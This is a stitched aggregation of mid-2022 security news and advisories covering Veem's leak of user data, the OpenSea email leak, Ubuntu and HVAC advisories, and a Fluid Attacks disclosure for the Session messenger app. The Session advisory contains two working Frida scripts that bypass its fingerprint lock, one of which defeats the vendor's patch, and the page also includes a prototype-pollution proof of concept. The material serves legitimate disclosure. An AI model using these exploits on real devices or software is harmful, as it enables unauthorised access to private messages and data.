deep.assign npm package 0.0.0-alpha.0 is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution').

**Prototype Pollution in deep.assign**

Moderate severity GitHub Reviewed Published Jul 1, 2022 • Updated Jul 6, 2022

GHSA-3829-mgmw-jcg4: Prototype Pollution in deep.assign

PingID Windows Login prior to 2.8 does not properly set permissions on the Windows Registry entries used to store sensitive API keys under some circumstances.

CVE-2022-23725: Ping Identity Documentation Portal

A password link that didn't expire leads to the discovery of exposed personal information at a payments service.

_Editor's Note: Dark Reading was able to verify that the issue Cerrudo found was present as of June 24, when we created an account on Veem and confirmed that the personal information and partial bank account information was visible to anyone else. We also confirmed that even after deleting the account, most of the information remained accessible. We contacted Veem, and they provided this comment:_

_"Veem is committed to safeguarding customer information and funds and has in place a comprehensive security program that includes internal, external and regulatory assessments. We have responded to Mr. Cerrudo, and we continue to evaluate information provided to us by customers or third parties to ensure that any issues raised from those sources are included in our roadmap, as appropriate. As a matter of policy, we do not publicly comment on specifics of our program, other than to reinforce that we take our obligations seriously and devote substantial resources to deliver services in a reliable and secure manner."_

Over the years I have made hundreds of disclosures, and it still amazes me how some companies have such bad security practices and lack of security awareness.

This is a cybersecurity horror story from Veem, a well-funded fintech company that clearly fails badly at security and privacy. What's Veem? From its site: "Easily pay vendors and contractors domestically or internationally in over 100 countries, and get paid faster with one simple, yet powerful digital payments solution. With more payment flexibility and visibility, Veem gives small businesses the power to save time and control cash flow."

This all started when I was using the Veem service. It was pretty good, cheap, and easy to use. I liked it, and I recommended it. But I grew concerned about Veem's approach to security.

First I noticed that it displayed too much information about Veem users who weren't in my contact list. I just ignored it, though, and kept using it. Then one day, I was unable to log in and was forced to change my password via an email with a link to a form. I used the form to change my password, but I noticed something weird in this process, so I left the email marked to take a look at later.

After some days, I remembered about the email I saved and went to take a look. I clicked on the link and was presented again with a form to change my password. That was unusual — the link should have expired because I had already changed my password and because too much time had passed since the link was sent to me. Then, when examining the link, I realized that it was sent using the Mailchimp add-on Mandrill. That meant that this platform, a third-party email marketing and automation service, had access to change my password for many days, since it had the link saved in its systems. This is a really bad security practice that any minimum security check should have identified. I started to believe that Veem's systems hadn't been security tested.

After I found this password change security issue, I got a bit worried about Veem's security overall. It's a fintech solution that allows users to send and get payments, so it deals with a lot of money from its users, including myself. I decided to take a deeper look at some functionality that had looked strange to me but I had ignored earlier. I logged in, accessed this functionality, and, to my surprise, I found out that they were leaking all users' personal information, such as full name, address, city, state, country, email, phone number, date of birth, bank name, account type, and last four digits of bank account number. I couldn't believe what I was seeing — anyone could easily access any Veem user's personal information.  

I had to quickly report these issues — especially the last one, which was very critical. After I got help finding the correct contact email, on March 29, 2022, I emailed \[email protected\] detailing the problems. I was hoping for a quick answer, but no. On April 2, I emailed again, and after two days, still no answer. I was getting worried, since when you report such a critical issue, you should get an instant response. Every day that passes means someone gets another chance to exploit the issue.

Thinking about how to get a response, I got an interesting idea: What about using the security issue to find out information about Veem executives? So I got the Veem CEO's information — all of his information, but I really just needed the email address. I didn't think cold-calling him would be a good idea, and no, I'm not doxing him here. :)

**Initial Outreach**

On April 4 I sent an email to the CEO:

_Hi, I sent this (I forwarded previous email sent to \[email protected\]) almost a week ago and I haven't had any answer._

_There is at least a serious issue that leaks users personal information such as full name, email, date of birth, address, phone number, name of user's Bank, bank account last 4 numbers, etc._

_Please have your security team take a look and answer ASAP._

_Thanks._

_Cesar Cerrudo_

_Chief Research Officer_

_Strike_

Later that day, I got the following from \[email protected\]:

_Hello Cesar,_

_I want to thank you for proactively reaching out to us regarding the vulnerabilities you have found on our web application. Unfortunately, we do not have a bug bounty program or a financial reward at this time and there are no exceptions for one-time rewards either._

_In the meantime, we hope you continue leveraging the Veem network for your payments, and keep us informed on any future feedback you may have that will make it better and safer for all of our customers._

_Thank you for your time and understanding._

_Regards,_

_Cyber Security Team_

As you can see, they clearly didn't realize the criticality of the issue and thought that I was just looking for some reward. I had to explain (cc'ing the CEO just in case):

_Hi_

_I'm not looking for any reward, I just want you to take a look at the issues and fix them ASAP, once they are fixed let your users know about it. Also in the meantime provide feedback._

_For a financial institution it is very serious to leak customers information._

_btw, I'm CCing your CEO so he is aware of this, I got his personal information from Veem platform._

_Cesar Cerrudo_

_Chief Research Officer_

_Strike_

Then, after two days, they replied:

_Hello Cesar,_

_Thanks for following up._

_Apropos your findings, we are already tracking the two information leakage-related gaps in our risk register. These gaps exist to support otherwise desirable features — changing their design to eliminate this avenue for data exfiltration is nonetheless on our product roadmap. However, because this logic exists to support features which our customers expect to work, there is no quick or easy solution available. We recognize that this is a shortcoming and are planning appropriate redesign — prioritizing security and privacy, while also retaining essential parts of our product's user journey and customer experience._

_Regarding password reset links, you raise an entirely valid concern regarding link expiry. We have scheduled a fix for release in an upcoming sprint cycle._

_Once again, thank you for your proactive outreach and for helping us improve the security and privacy of our platform._

_Thanks,_

_Veem security team_

**Please Prioritize Security**

Cool, so they're fixing the password reset issue, but the personal information leakage is a feature they can't easily fix? How are they "prioritizing security and privacy"? Welcome to the 2020s, where fintechs prioritize functionality over security and privacy.

At this point it was clear to me that this was a very immature company in terms of cybersecurity and privacy, so I would have to deal with this in the best possible way and try harder to make them understand the issues, collaborate, and act quickly. I replied:

_Hi_

_Thanks for getting back with more details._

_I completely understand your challenges and point of view. What I would like is to have more visibility on this, so I would like to get some timeline information, like when are you planning to start working on the fixes and when they will be ready. As you may know, when vulnerabilities are reported is called responsible/coordinated disclosure, it requires collaboration from both sides and there is a limited waiting period for the issues to be fixed. We can't wait forever, holding back the vulnerability information we have that affects several thousand of your users, if you don't fix it in a short period of time we need to go public and let people know about the issues. If you are not familiar with responsible/coordinated disclosure, please take a look at it to understand these common practices on cyber security._

_I'm open for a quick call if you like so we can be on same page on this._

_Thanks._

_Cesar Cerrudo_

_Chief Research Officer_

_Strike_

Twelve days after the above email was sent, I still had no answer at all, so I asked for news. The following day they replied:

_Hello Cesar,_

_We are actively addressing these findings._

_Please be assured that we take this seriously and that customer security and privacy are at the top of our priorities._

_Thanks_

_Veem Security Team_

I wasn't happy with the answer. Such a delay and lack of communication doesn't reflect taking security and privacy seriously.

**Sketchy NDA**

Anyway, I waited for a few days to see if they would get back to me again with more updates — but, no, I had to email them again:

_Hi_

_I'm sorry but it seems you are not understanding how severe the issue is and how to manage it. Please let's have a call urgently and have some decision maker attend. I'm available most days from 1:30pm to 3pm ET_

_Thanks._

_Cesar Cerrudo_

_Chief Research Officer_

_Strike_

The same day, they replied:

_Hi Cesar,_

_We would like to send you our SOC2 report and set up a discussion but need to put an NDA in place to do so. Our CSO proposes that we connect at 2:15 pm EST on 5 May 2022 to address questions you may have. Here is the link for our eNDA http://bit.ly/VeemNDA_

_Veem Security team_

That was weird — why did they mention the SOC2 report? They wanted to show me they were in compliance? But were they? Also, that was on April 25, and they wanted to have a call in two weeks — more than a month since I sent the initial report — so clearly they didn't feel any urgency.

Plus they wanted me to sign a nondisclosure agreement (NDA). That was an indication of suspect cooperation, in my experience; when a company dealing with a disclosure brings an NDA, it's highly probable they want to keep everything hidden. I discussed this with my team at Strike and got back to Veem the next day:

_Hi_

_Ok, let's confirm the call for 2:15 pm EST on 5 May 2022. We don't usually sign NDA for this so I have to consult our lawyer and will get back to you ASAP._

_Cesar Cerrudo_

_Chief Research Officer_

_Strike_

After taking a look at the NDA with our lawyer, we identified that it said: _"evaluate the potential for, or the expansion of, a business relationship between the parties..."_

Why would they want us to sign an NDA that mentions business relationships?

**Avoiding the Problem**

On April 28 I replied:

_Hi_

_After evaluating the NDA, it says: "evaluate the potential for, or the expansion of, a business relationship between the parties" which doesn't make sense since we aren't talking about any business here._

_Also the NDA should explicitly exclude the vulnerability information I already shared with you and any previous communication before the NDA is signed. I see two options, we don't sign the NDA or the NDA is modified with my requests. Anyway, I think we can have the call next week without NDA, what's important is to talk about current situation and plans to fix it._

_Thanks._

_Cesar Cerrudo_

_Chief Research Officer_

_Strike_

Unsurprisingly I got no answer. Then on May 4, one day before the call was supposed to take place, I asked for updates:

_Hi, are we having the call tomorrow? please send an invite._

_Thanks._

_Cesar Cerrudo_

_Chief Research Officer_

_Strike_

and later the same day I got the following:

_Hello Cesar,_

_We are pleased to convey that your concerns have been addressed and our platform has been updated. As such, a meeting will not be required._

_Thank you for being our valued customer._

_Sincerely_

_Veem Cybersecurity Team_

Whoa, that was really a surprise. I didn't like the answer, but I thought, "OK, at least they fixed the issues." Of course I have to check, though, so I took a look at the issues again.

The password reset issue was partially fixed but only partially because they continue to use the same mailing/marketing service. And surprise, surprise, surprise — the main issue was not really fixed :(

For the personal information leakage, they only removed the date of birth and the last four digits of the bank account number. But the last four digits of the bank account number were still displayed in another field in same HTTP response, so they were still leaking everything except the date of birth. Really bad fixes.

**In Short: Terrible**

After many efforts and goodwill from our side, Veem proceeded in a very unprofessional and noncollaborative way, demonstrating lack of security and privacy awareness. We decided we needed to go ahead and publish this in order to let people know.

The personal information leakage can allow cybercriminals to easily perform several attacks, such as phishing, SIM swapping, etc., resulting in possible huge money losses.

Veem didn't notify its customers about the issues. Instead it tried to silently fix them — and failed.

Veem users should contact Veem directly and ask for an explanation. In the meantime, we recommend Veem users to set the "List my Information" or "List my business" (depending on account type) user account setting to "NO" — it is set to "YES" by default. Setting it to "NO" doesn't prevent the personal information leakage, but it does make it a bit difficult.

It's hard to understand how a company that has $100 million in investments doesn't allocate proper resources to cybersecurity and privacy, especially when dealing with users' money. Also, I wonder if they are violating any regulations.

Sadly, bad security and privacy practices are not exclusive to Veem. Many fintech companies choose feature release speed and great user experience over security and privacy. From one side, they want to get more customers and delight them, but from the other side, they don't properly protect their customers' data and privacy. Security and privacy should always be top priority, especially in fintech.

A Fintech Horror Story: How One Company Prioritizes Cybersecurity

Session 1.13.0 allows an attacker with physical access to the victim's device to bypass the application's password/pin lock to access user data. This is possible due to lack of adequate security controls to prevent dynamic code manipulation.

**Summary**

**Name**

Session 1.13.0 - Improper Access Control (Fingerprint)

**Code name**

Tempest

**Product**

Session

**Affected versions**

Version 1.13.0

**State**

Public

**Release date**

2022-06-28

**Vulnerability**

**Kind**

Improper Access Control - Fingerprint

**Rule**

115\. Security controls bypass or absence

**Remote**

No

**CVSSv3 Vector**

CVSS:3.1/AV:P/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

**CVSSv3 Base Score**

6.3

**Exploit available**

Yes

**CVE ID(s)**

CVE-2022-1955

**Description**

An attacker with physical access to the victim's device can bypass the application's fingerprint lock to access user data. This is possible due to lack of adequate security controls to prevent dynamic code manipulation.

In android application fingerprint implementations, the **onAuthenticationSucceded** method is triggered when the system successfully authenticates a user. Most biometric authentication implementations rely on this method being called, without worrying about the CryptoObject. The application logic responsible for unlocking the application is usually included in this callback method. This approach is trivially exploited by connecting to the application process and calling the **AuthenticationSucceded** method directly, as a result, the application can be unlocked without providing valid biometric data. (In short, fingerprint validation depends on an event and not on an actual security validation.)

Another common case, occurs when some developers use CryptoObject but do not encrypt/decrypt data that is crucial for the application to function properly. Therefore, we could skip the authentication step altogether and proceed to use the application.

**Proof of Concept**

Attached below is a proof-of-concept video showing the exploitation of the vulnerability:

**Steps to reproduce**

1.  Install and configure frida as indicated in the following link.
    
2.  Now just run this command to hook into the fingerprint listener, so that you can dynamically rewrite its implementation to bypass the application's protection.
    
        frida -U 'Session' -l exploit.js --no-pause
        
    
3.  Now on your device press the 'recent' button, commonly represented by a square. This button opens the recent apps view so that you can switch from one open app to another.
    
4.  Log back into Session.
    
5.  As you had left the exploit running with frida, you will notice that in less than a second you will enter the application, without even having set a valid fingerprint.
    

**Exploit**

    // exploit.js
    const getAuthResult = (AuthenticationResult, crypto) => AuthenticationResult.$new(
        crypto, null, 0
    );
    
    const exploit = () => {
        console.log("[+] Hooking PassphrasePromptActivity - Method resumeScreenLock");
        const AuthenticationResult = Java.use(
            'android.hardware.fingerprint.FingerprintManager$AuthenticationResult'
        );
        const FingerprintManager  = Java.use(
            'android.hardware.fingerprint.FingerprintManager'
        );
        const CryptoObject = Java.use(
            'android.hardware.fingerprint.FingerprintManager$CryptoObject'
        );
    
        console.log("Hooking FingerprintManagerCompat.authenticate()...");
        const fingerprintManager_authenticate = FingerprintManager['authenticate'].overload(
            'android.hardware.fingerprint.FingerprintManager$CryptoObject',
            'android.os.CancellationSignal',
            'int',
            'android.hardware.fingerprint.FingerprintManager$AuthenticationCallback',
            'android.os.Handler'
        );
    
        fingerprintManager_authenticate.implementation = (
            crypto, cancel, flags, callback, handler) => {
            console.log("Bypass Lock Screen - Fingerprint");
    
            // We send a null cryptoObject to the listener of the fingerprint
            var crypto = CryptoObject.$new(null);
            var authenticationResult = getAuthResult(AuthenticationResult, crypto);
            callback.onAuthenticationSucceeded(authenticationResult);
            return this.authenticate(crypto, cancel, flags, callback, handler);
        }
    }
    
    Java.perform(() => exploit());
    

**Mitigation****Bypass of the patch implemented at Session 1.13.4**

After reporting the security flaw, the Session team implemented a patch. However, I managed to bypass the patch using the following exploit:

    // exploit.js
    const getAuthResult = (AuthenticationResult, crypto) => AuthenticationResult.$new(
        crypto, null, 0
    );
    
    const exploit = () => {
        console.log("[+] Hooking PassphrasePromptActivity - Method resumeScreenLock");
        const KeyPairGenerator = Java.use(
            'java.security.KeyPairGenerator'
        );
        const Signature = Java.use(
            'java.security.Signature'
        );
        const BiometricSecretProvider = Java.use(
            'org.thoughtcrime.securesms.crypto.BiometricSecretProvider'
        );
        const AuthenticationResult = Java.use(
            'android.hardware.fingerprint.FingerprintManager$AuthenticationResult'
        );
        const FingerprintManager  = Java.use(
            'android.hardware.fingerprint.FingerprintManager'
        );
        const CryptoObject = Java.use(
            'android.hardware.fingerprint.FingerprintManager$CryptoObject'
        );
    
        console.log("Hooking FingerprintManagerCompat.authenticate()...");
        const fingerprintManager_authenticate = FingerprintManager['authenticate'].overload(
            'android.hardware.fingerprint.FingerprintManager$CryptoObject',
            'android.os.CancellationSignal',
            'int',
            'android.hardware.fingerprint.FingerprintManager$AuthenticationCallback',
            'android.os.Handler'
        );
    
        fingerprintManager_authenticate.implementation = (
            crypto, cancel, flags, callback, handler) => {
            console.log("Bypass Lock Screen - Fingerprint");
    
            // Create Certificate
            var keyGenerator = KeyPairGenerator.getInstance("RSA");
            keyGenerator.initialize(2048);
            var signatureKey = keyGenerator.generateKeyPair();
            var signature = Signature.getInstance("MD5withRSA");
            signature.initSign(signatureKey.getPrivate());
            var crypto = CryptoObject.$new(signature);
    
            // Create a valid authenticationResult
            var authenticationResult = getAuthResult(AuthenticationResult, crypto);
    
            // Bypass Validations
            BiometricSecretProvider.verifySignature.implementation = (data, signedData) => {
                return true;
            }
    
            // Success
            callback.onAuthenticationSucceeded(authenticationResult);
            return this.authenticate(crypto, cancel, flags, callback, handler);
        }
    }
    
    Java.perform(() => exploit());
    

The reason the bypass succeeded is because the **onAuthenticationSucceeded** method still depends on a boolean.

If the cryptographic verification works fine, it returns true. However, the correct thing to do would be for it to retrieve the encryption object from the parameter and USE this encryption object to decrypt some other crucial data, such as the session key (by **"session key"** I don't mean the session application's private key. I simply mean a unique identifier of the user's session) or a secondary symmetric key that will be used to decrypt the application data.

This is why in the description of this finding, we have cited the following:

> some developers use CryptoObject but do not encrypt/decrypt data that is crucial for the application to function properly. Therefore, we could skip the authentication step altogether and proceed to use the application.

Currently, in version 1.13.6 the Session team has not implemented a second patch to prevent the second exploit.

**System Information**

*   Package Name: network.loki.messenger
*   Application Label: Session
*   Mobile app version: 1.13.0
*   OS: Android 8.0 (API 26)

**Credits**

The vulnerability was discovered by Carlos Bello from the Offensive Team of Fluid Attacks.

**References**

**Vendor page:** https://github.com/oxen-io/session-android

**MR page:** https://github.com/oxen-io/session-android/pull/897

**Timeline**

2022-05-26

Vulnerability discovered.

2022-05-26

Vendor contacted.

2022-05-27

Vendor Confirmed the vulnerability.

2022-06-28

Public Disclosure.

CVE-2022-1955: Session 1.13.0 - Improper Access Control (Fingerprint) | Fluid Attacks

Ubuntu Security Notice 5497-1 - It was discovered that Libjpeg6b was not properly performing bounds checks when compressing PPM and Targa image files. An attacker could possibly use this issue to cause a denial of service. Chijin Zhou discovered that Libjpeg6b was incorrectly handling the EOF character in input data when generating JPEG files. An attacker could possibly use this issue to force the execution of a large loop, force excessive memory consumption, and cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-5497-1June 30, 2022libjpeg6b vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 14.04 ESMSummary:Several security issues were fixed in Libjpeg6b.Software Description:- libjpeg6b: library for handling JPEG filesDetails:It was discovered that Libjpeg6b was not properly performing boundschecks when compressing PPM and Targa image files. An attacker couldpossibly use this issue to cause a denial of service.(CVE-2018-11212)Chijin Zhou discovered that Libjpeg6b was incorrectly handling theEOF character in input data when generating JPEG files. An attackercould possibly use this issue to force the execution of a large loop,force excessive memory consumption, and cause a denial of service.(CVE-2018-11813)Sheng Shu and Dongdong She discovered that Libjpeg6b was not properlylimiting the amount of memory being used when it was performingdecompression or multi-pass compression operations. An attacker couldpossibly use this issue to force excessive memory consumption andcause a denial of service. (CVE-2020-14152)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 14.04 ESM:   libjpeg62                       6b1-4ubuntu1+esm1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5497-1   CVE-2018-11212, CVE-2018-11213, CVE-2018-11214, CVE-2018-11813,   CVE-2020-14152

Ubuntu Security Notice USN-5497-1

The device suffers from multiple vulnerabilities including: Default Credentials, CSRF, Authenticated Stored XSS and Open Redirect.

Title: Carel pCOWeb HVAC BACnet Gateway 2.1.0 Unauthenticated Directory Traversal  
Advisory ID: ZSL-2022-5709  
Type: Local/Remote  
Impact: Exposure of System Information, Exposure of Sensitive Information  
Risk: (4/5)  
Release Date: 30.06.2022

**Summary**

pCO sistema is the solution CAREL offers its customers for managing HVAC/R applications and systems. It consists of programmable controllers, user interfaces, gateways and communication interfaces, remote management systems to offer the OEMs working in HVAC/R a control system that is powerful yet flexible, can be easily interfaced to the more widely-used Building Management Systems, and can also be integrated into proprietary supervisory systems.

**Description**

The device suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the 'file' GET parameter through the 'logdownload.cgi' Bash script is not properly verified before being used to download log files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks.

**Vendor**

CAREL INDUSTRIES S.p.A. - https://www.carel.com

**Affected Version**

Firmware: A2.1.0 - B2.1.0  
Application Software: 2.15.4A  
Software version: v16 13020200

**Tested On**

GNU/Linux 4.11.12 (armv7l)  
thttpd/2.29

**Vendor Status**

\[10.05.2022\] Vulnerability discovered.  
\[27.05.2022\] Vendor contacted.  
\[27.05.2022\] Vendor responds creating request ID 00027344. Will come back soon with an answer.  
\[29.06.2022\] No response from the vendor.  
\[30.06.2022\] Public security advisory released.

**PoC**

carelpco\_dir.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[30.06.2022\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

Carel pCOWeb HVAC BACnet Gateway 2.1.0 Unauthenticated Directory Traversal

All users who shared their email address with NFT marketplace told: ‘Assume you were impacted’

All users who shared their email address with NFT marketplace told: ‘Assume you were impacted’

UPDATED OpenSea, the world’s largest non-fungible token (NFT) marketplace, has revealed that a rogue employee at a third-party vendor has shared its users email addresses with an unauthorized external entity.

“If you have shared your email with OpenSea in the past, you should assume you were impacted,” users were warned by OpenSea head of security Cory Hardman in a blog post yesterday (June 29).

According to OpenSea, the culprit was employed by Customer.io, an automated messaging platform used by marketers to create and send emails, push notifications, and SMS messages.

Catch up with the latest blockchain security news

“We recently learned that an employee of Customer.io, our email delivery vendor, misused their employee access to download and share email addresses – provided by OpenSea users and subscribers to our newsletter – with an unauthorized external party,” said Hardman.

“We are working with Customer.io in their ongoing investigation, and we have reported this incident to law enforcement.”

Customer.io issued the following statement to The Daily Swig:

  

As soon as we learned of the incident, we took immediate steps to investigate, contain its impact and determine its source, including hiring a third-party forensic investigations firm. We are working closely with OpenSea and are reviewing exactly how these email addresses were compromised.

We believe this resulted from the actions of an employee who had role-specific access privileges that were abused. We do not believe any other clients’ data has been compromised, but we are continuing to investigate. The employee in question has had all access removed and has been suspended pending the conclusion of our investigation.

Additionally we are always working to improve our security and we have launched a comprehensive review of our access and compliance policies and will make adjustments where necessary.

**Phishing warning**

Hardman warned users of “a heightened likelihood for email phishing attempts”, and urged them to “be alert for any attempt to impersonate OpenSea” from email addresses that look “visually similar to our official email domain, ‘opensea.io’ (such as ‘opensea.org’ or some other variation).”

Moreover, continued Hardman, users should always scrutinize embedded hyperlinks before clicking, and never download attachments from emails purporting to be from OpenSea, or share passwords or secret wallet phrases, or sign wallet transactions, when prompted via email.

Over on Twitter, security researcher ‘CIA Officer’ advised users to be vigilant about the use phishing tool Email Appender, IP-loggers, and canary tokens.

“I strongly recommend checking email header, domain and disable ‘download remote content’, also do not forget about MFA \[multi-factor authentication\]!” they added.

Founded in in New York in 2017, OpenSea claims to be the world’s first as well as biggest marketplace focused on NFTs and crypto collectibles.

This article was updated on June 30 with comment from Customer.io

DON’T MISS Ready meal distributor Apetito restores ‘limited’ deliveries in UK following cyber-attack

OpenSea user email addresses leaked by rogue employee at third-party vendor

All users who shared their email address with NFT marketplace told: ‘Assume you were impacted’

UPDATED OpenSea, the world’s largest non-fungible token (NFT) marketplace, has revealed that a rogue employee at a third-party vendor has shared its users email addresses with an unauthorized external entity.

“If you have shared your email with OpenSea in the past, you should assume you were impacted,” users were warned by OpenSea head of security Cory Hardman in a blog post on June 29.

The alleged culprit was employed by Customer.io, an automated messaging platform used by marketers to create and send emails, push notifications, and SMS messages.

Catch up with the latest blockchain security news

“We recently learned that an employee of Customer.io, our email delivery vendor, misused their employee access to download and share email addresses – provided by OpenSea users and subscribers to our newsletter – with an unauthorized external party,” said Hardman.

“We are working with Customer.io in their ongoing investigation, and we have reported this incident to law enforcement.”

**Security improvements**

Customer.io initially told The Daily Swig that “the employee in question has had all access removed and has been suspended pending the conclusion of our investigation”.

That investigation then unearthed further leaks, with Customer.io issuing a further statement on July 7 saying it had learned that the rogue employee had provided email addresses associated with five other customers “to the same external bad actor”.

It continued:

  

We know this was a result of the deliberate actions of a senior engineer who had an appropriate level of access to perform their duties, and provided these email addresses to the bad actor. This action was limited to this single employee.

Despite the many precautions taken to protect our customer data, the employee’s role enabled specific access to these email addresses. This employee has been terminated, all access has been revoked and we have reported this employee to law enforcement.

The protection of our customer’s data is our first priority and this employee’s actions let us all down. We have alerted the five other customers to this information and sincerely apologize to them.

Customer.io said that a comprehensive security review of access and security policies had already resulted in a number of changes.

These include intrusion detection and immutable logging improvements to provide more proactive notifications of data exfiltration, further restrictions on access to production systems and data stores, rotation of all access and authorization keys for critical services, and turning access to customer account data off by default.

Moreover, when permitted to access customer accounts, Customer.io staff can no longer export customer data.

The firm said it was also retraining all staff on security policies.

Finally, Customer.io said it did “not expect to learn \[of\] any additional information \[being compromised\] since this incident resulted from the actions of a single employee, who had legitimate access to these email addresses as part of the employee’s job”.

**Phishing warning**

Cory Hardman from OpenSea warned users of “a heightened likelihood for email phishing attempts”, and urged them to “be alert for any attempt to impersonate OpenSea” from email addresses that look “visually similar to our official email domain, ‘opensea.io’ (such as ‘opensea.org’ or some other variation).”

Moreover, continued Hardman, users should always scrutinize embedded hyperlinks before clicking, and never download attachments from emails purporting to be from OpenSea, or share passwords or secret wallet phrases, or sign wallet transactions, when prompted via email.

Over on Twitter, security researcher ‘CIA Officer’ advised users to be vigilant about the use phishing tool Email Appender, IP-loggers, and canary tokens.

“I strongly recommend checking email header, domain and disable ‘download remote content’, also do not forget about MFA \[multi-factor authentication\]!” they added.

Founded in in New York in 2017, OpenSea claims to be the world’s first as well as biggest marketplace focused on NFTs and crypto collectibles.

This article was updated on June 30 with comment from Customer.io, and then with an additional update from Customer.io on July 11

DON’T MISS Ready meal distributor Apetito restores ‘limited’ deliveries in UK following cyber-attack

OpenSea among six organizations affected by email address leak by rogue employee at third-party vendor

✍️ Description  
deep.assign npm package is vulnerable to prototype pollution vulnerability prior to version 0.0.0-alpha.0.

    var deepAssign = require("deep.assign@0.0.0-alpha.0")
    var obj=JSON.parse('{"__proto__":{"polluted":1}}')
    var obj1 = {"red":"apple"}
    console.log("Before:"+{}.polluted)
    var c=deepAssign.deepAssign(obj1,obj)
    console.log("After:"+{}.polluted)
    

💥 Impact  
May lead to Information Disclosure/DoS/RCE.

CVE-2021-40663: Prototype Pollution in deep.assign npm package · Issue #1 · janbialostok/deep-assign

SilverStripe Framework 4.x prior to 4.10.9 is vulnerable to cross-site scripting inside the href attribute of an HTML hyperlink, which can be added to website content via XMLHttpRequest (XHR) by an authenticated CMS user.

**Stored XSS in link tags added via XHR in SilverStripe Framework**

Moderate severity GitHub Reviewed Published Jun 29, 2022 • Updated Jun 29, 2022

Tag

#perl